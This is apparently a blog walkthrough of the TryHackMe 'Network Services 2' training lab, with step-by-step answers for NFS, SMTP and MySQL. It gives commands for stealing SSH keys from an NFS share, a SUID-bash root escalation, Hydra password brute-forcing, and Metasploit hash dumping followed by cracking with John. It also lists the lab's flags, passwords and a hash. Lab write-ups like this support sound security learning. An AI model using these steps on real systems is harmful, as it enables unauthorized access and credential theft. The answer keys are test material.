TryHackMe | Network Services 2 Walkthrough
Hi there, I’m glad to see you here. In this article, we’ll examine together the “Network Services 2” room in TryHackMe (Cyber Defense Learning Path). In some sections, I’ll share brief about the subject. Don’t forget! You must always research to learn more. I hope it will be helpful for you. Let’s start!
Contents:
-Cyber Defense Introduction | Network Services 2
- Understanding NFS
- Enumerating NFS
- Exploiting NFS
- Understanding SMTP
- Enumerating SMTP
- Exploiting SMTP
- Understanding MySQL
- Enumerating MySQL
- Exploiting MySQL
Cyber Defense Introduction | Network Services 2
Understanding NFS
NFS stands for “Network File System” and allows a system to share directories and files with others over a network.
-By using NFS, users and programs can access files on remote systems almost as if they were local files.
-Using the NFS protocol, you can transfer files between computers running Windows and other non-Windows operating systems, such as Linux, MacOS or UNIX.
Q1: What does NFS stand for?
A1: Network File System
Q2: What process allows an NFS client to interact with a remote directory as though it was a physical device?
A2: Mounting
Q3: What does NFS use to represent files and directories on the server?
A3: file handle
Q4: What protocol does NFS use to communicate between the server and client?
A4: RPC
Q5: What two pieces of user data does the NFS server take as parameters for controlling user permissions? Format: parameter 1 / parameter 2
A5: user id / group id
Q6: Can a Windows NFS server share files with a Linux client? (Y/N)
A6: Y
Q7: Can a Linux NFS server share files with a MacOS client? (Y/N)
A7: Y
Q8: What is the latest version of NFS? [released in 2016, but is still up to date as of 2020] This will require external research.
A8: 4.2
Enumerating NFS
nfs-common: Primarily, we are concerned with “showmount” and “mount.nfs” as these are going to be most useful to us when it comes to extracting information from the NFS share.
-You can install nfs-common using “apt install nfs-common”.
Q1: Conduct a thorough port scan scan of your choosing, how many ports are open?
A1: 7
Q2: Which port contains the service we’re looking to enumerate?
A2: 2049
Q3: Now, use /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?
A3: /home
Q4: Time to mount the share to our local machine!
First, use “mkdir /tmp/mount” to create a directory on your machine to mount the share to. This is in the /tmp directory- so be aware that it will be removed on restart.
Then, use the mount command we broke down earlier to mount the NFS share to your local machine. Change directory to where you mounted the share- what is the name of the folder inside?
A4: cappucino
Step 1: Use “mkdir” command to create directory.
Step 2: Use the “mount” command to mount the NFS share to your local machine.
mount: Execute the mount command
-t nfs: Type of device to mount, then specifying that it’s NFS
IP:share: The IP Address of the NFS server, and the name of the share we wish to mount
nolock: Specifies not to use NLM locking
Q5: Have a look inside this directory, look at the files. Looks like we’re inside a user’s home directory…
A5: No answer needed
Q6: Interesting! Let’s do a bit of research now, have a look through the folders. Which of these folders could contain keys that would give us remote access to the server?
A6: .ssh
Q7: Which of these keys is most useful to us?
A7: id_rsa
Q8: Copy this file to a different location your local machine, and change the permissions to “600” using “chmod 600 [file]”.
Assuming we were right about what type of directory this is, we can pretty easily work out the name of the user this key corresponds to.
Can we log into the machine using ssh -i <key-file> <username>@<ip> ? (Y/N)
A8: Y
Step 1: Copy this file to a different location your local machine using the “cp” command.
Step 2: Change the permissions to “600” using “chmod 600 [file]”.
Step 3: Connect via SSH using id_rsa file.
Exploiting NFS
-By default, on NFS shares- Root Squashing is enabled, and prevents anyone connecting to the NFS share from having root access to the NFS volume.
NFS Access:
1-Gain Low Privilege Shell
2-Upload Bash Executable to the NFS share
3-Set SUID Permissions Through NFS Due To Misconfigured Root Squash
4-Login through SSH
5-Execute SUID Bit Bash Executable
6-ROOT ACCESS
Q1: First, change directory to the mount point on your machine, where the NFS share should still be mounted, and then into the user’s home directory.
A1: No answer needed
Q2: Download the bash executable to your Downloads directory. Then use “cp ~/Downloads/bash .” to copy the bash executable to the NFS share. The copied bash shell must be owned by a root user, you can set this using “sudo chown root bash”
A2: No answer needed
Step 1: Download the bash executable to your Downloads directory.
Step 2: Use “cp ~/Downloads/bash .” to copy the bash executable to the NFS share.
Step 3: The copied bash shell must be owned by a root user, you can set this using “chown root bash”
Q3: Now, we’re going to add the SUID bit permission to the bash executable we just copied to the share using “sudo chmod +[permission] bash”. What letter do we use to set the SUID bit set using chmod?
A3: s
Q4: Let’s do a sanity check, let’s check the permissions of the “bash” executable using “ls -la bash”. What does the permission set look like? Make sure that it ends with -sr-x.
A4: -rwsr-sr-x
Q5: Now, SSH into the machine as the user. List the directory to make sure the bash executable is there. Now, the moment of truth. Lets run it with “./bash -p”. The -p persists the permissions, so that it can run as root with SUID- as otherwise bash will sometimes drop the permissions.
A5: No answer needed
Q6: Great! If all’s gone well you should have a shell as root! What’s the root flag?
A6: THM{nfs_got_pwned}
Congratulations! You found the flag.
Understanding SMTP
The Simple Mail Transfer Protocol (SMTP) is a technical standard for transmitting electronic mail (email) over a network.
POP, or “Post Office Protocol” and IMAP, “Internet Message Access Protocol” are both email protocols who are responsible for the transfer of email between a client and a mail server.
How does SMTP work?
1-The mail user agent, which is either your email client or an external program. connects to the SMTP server of your domain, e.g. smtp.google.com. This initiates the SMTP handshake. This connection works over the SMTP port- which is usually 25. Once these connections have been made and validated, the SMTP session starts.
2-The process of sending mail can now begin. The client first submits the sender, and recipient’s email address- the body of the email and any attachments, to the server.
3-The SMTP server then checks whether the domain name of the recipient and the sender is the same.
4-The SMTP server of the sender will make a connection to the recipient’s SMTP server before relaying the email. If the recipient’s server can’t be accessed, or is not available- the Email gets put into an SMTP queue.
5-Then, the recipient’s SMTP server will verify the incoming email. It does this by checking if the domain and user name have been recognised. The server will then forward the email to the POP or IMAP server, as shown in the diagram above.
6-The E-Mail will then show up in the recipient’s inbox.
Q1: What does SMTP stand for?
A1: Simple Mail Transfer Protocol
Q2: What does SMTP handle the sending of? (answer in plural)
A2: emails
Q3: What is the first step in the SMTP process?
A3: SMTP handshake
Q4: What is the default SMTP port?
A4: 25
Q5: Where does the SMTP server send the email if the recipient’s server is not available?
A5: smtp queue
Q6: On what server does the Email ultimately end up on?
A6: POP/IMAP
Q7: Can a Linux machine run an SMTP server? (Y/N)
A7: Y
Q8: Can a Windows machine run an SMTP server? (Y/N)
A8: Y
Enumerating SMTP
Q1: First, lets run a port scan against the target machine, same as last time. What port is SMTP running on?
A1: 25
Q2: Okay, now we know what port we should be targeting, let’s start up Metasploit. What command do we use to do this?
If you would like some more help, or practice using, Metasploit, Darkstar has an amazing room on Metasploit that you can check out here:
A2: msfconsole
-q: Do not print the banner on startup.
Q3: Let’s search for the module “smtp_version”, what’s it’s full module name?
A3: auxiliary/scanner/smtp/smtp_version
Q4: Great, now- select the module and list the options. How do we do this?
A4: options
Q5: Have a look through the options, does everything seem correct? What is the option we need to set?
A5: RHOSTS
Q6: Set that to the correct value for your target machine. Then run the exploit. What’s the system mail name?
A6: polosmtp.home
Q7: What Mail Transfer Agent (MTA) is running the SMTP server? This will require some external research.
A7: Postfix
Q8: Good! We’ve now got a good amount of information on the target system to move onto the next stage. Let’s search for the module “smtp_enum”, what’s it’s full module name?
A8: auxiliary/scanner/smtp/smtp_enum
Q9: We’re going to be using the “top-usernames-shortlist.txt” wordlist from the Usernames subsection of seclists (/usr/share/wordlists/SecLists/Usernames if you have it installed).
Seclists is an amazing collection of wordlists. If you’re running Kali or Parrot you can install seclists with: “sudo apt install seclists” Alternatively, you can download the repository from here:
What option do we need to set to the wordlist’s path?
A9: USER_FILE
Q10: Once we’ve set this option, what is the other essential paramater we need to set?
A10: RHOSTS
Q11: Now, run the exploit, this may take a few minutes, so grab a cup of tea, coffee, water. Keep yourself hydrated!
A11: No answer needed
Q12: Okay! Now that’s finished, what username is returned?
A12: administrator
Exploiting SMTP
We have a few vital pieces of information:
1-A user account name
2-The type of SMTP server and Operating System running
We know from our port scan, that the only other open port on this machine is an SSH login. We’re going to use this information to try and bruteforce the password of the SSH login for our user using Hydra.
Q1: What is the password of the user we found during our enumeration stage?
A1: alejandro
Hydra is a parallelized login cracker which supports numerous protocols to attack.
hydra -l administrator -P /usr/share/wordlists/rockyou.txt 10.10.36.19 ssh-l: login with LOGIN name
-P: load several passwords from FILE
[machine IP]: the IP address of the target machine
ssh / protocol: sets the protocol
Q2: Great! Now, let’s SSH into the server as the user, what is contents of smtp.txt?
A2: THM{who_knew_email_servers_were_c00l?}
Congratulations! You found the flag.
Understanding MySQL
SQL is a standard language for accessing and manipulating databases.
-SQL stands for Structured Query Language.
-SQL lets you access and manipulate databases.
MySQL is an Oracle-backed open source relational database management system (RDBMS) based on Structured Query Language (SQL). MySQL runs on virtually all platforms, including Linux, UNIX and Windows.
RDBMS:
-RDBMS stands for Relational Database Management System.
-RDBMS is the basis for SQL, and for all modern database systems such as MSSQL Server, IBM DB2, Oracle, MySQL, and Microsoft Access.
-The data in RDBMS is stored in database objects called tables. A table is a collection of related data entries and it consists of columns and rows.
How does MySQL work?
1-MySQL creates a database for storing and manipulating data, defining the relationship of each table.
2-Clients make requests by making specific statements in SQL.
3-The server will respond to the client with whatever information has been requested.
Q1: What type of software is MySQL?
A1: relational database management system
Q2: What language is MySQL based on?
A2: SQL
Q3: What communication model does MySQL use?
A3: client-server
Q4: What is a common application of MySQL?
A4: back end database
Q5: What major social network uses MySQL as their back-end database? This will require further research.
A5: Facebook
Enumerating MySQL
Q1: As always, let’s start out with a port scan, so we know what port the service we’re trying to attack is running on. What port is MySQL using?
A1: 3306
Q2: Good, now- we think we have a set of credentials. Let’s double check that by manually connecting to the MySQL server. We can do this using the command “mysql -h [IP] -u [username] -p”
A2: No answer needed
Q3: Okay, we know that our login credentials work. Lets quit out of this session with “exit” and launch up Metasploit.
A3: No answer needed
Q4: We’re going to be using the “mysql_sql” module.
Search for, select and list the options it needs. What three options do we need to set? (in descending order).
A4: PASSWORD/RHOSTS/USERNAME
Q5: Run the exploit. By default it will test with the “select version()” command, what result does this give you?
A5: 5.7.29–0ubuntu0.18.04.1
Q6: Great! We know that our exploit is landing as planned. Let’s try to gain some more ambitious information. Change the “sql” option to “show databases”. how many databases are returned?
A6: 4
Exploiting MySQL
We know:
1-MySQL server credentials
2-The version of MySQL running
3-The number of Databases, and their names.
Q1: First, let’s search for and select the “mysql_schemadump” module. What’s the module’s full name?
A1: auxiliary/scanner/mysql/mysql_schemadump
Q2: Great! Now, you’ve done this a few times by now so I’ll let you take it from here. Set the relevant options, run the exploit. What’s the name of the last table that gets dumped?
A2: x$waits_global_by_latency
Q3: Awesome, you have now dumped the tables, and column names of the whole database. But we can do one better… search for and select the “mysql_hashdump” module. What’s the module’s full name?
A3: auxiliary/scanner/mysql/mysql_hashdump
Q4: Again, I’ll let you take it from here. Set the relevant options, run the exploit. What non-default user stands out to you?
A4: carl
Q5: Another user! And we have their password hash. This could be very interesting. Copy the hash string in full, like: bob:*HASH to a text file on your local machine called “hash.txt”.
What is the user/hash combination string?
A5: carl:*EA031893AA21444B170FC2162A56978B8CEECE18
Q6: Now, we need to crack the password! Let’s try John the Ripper against it using: “john hash.txt” what is the password of the user we found?
A6: doggie
Q7: Awesome. Password reuse is not only extremely dangerous, but extremely common. What are the chances that this user has reused their password for a different service?
What’s the contents of MySQL.txt?
A7: THM{congratulations_you_got_the_mySQL_flag}
Congratulations! You found the flag.
Thank you for your time. See you soon! Until that time.. Happy Hacking ❤
Resources:
https://www.cloudflare.com/learning/email-security/what-is-smtp
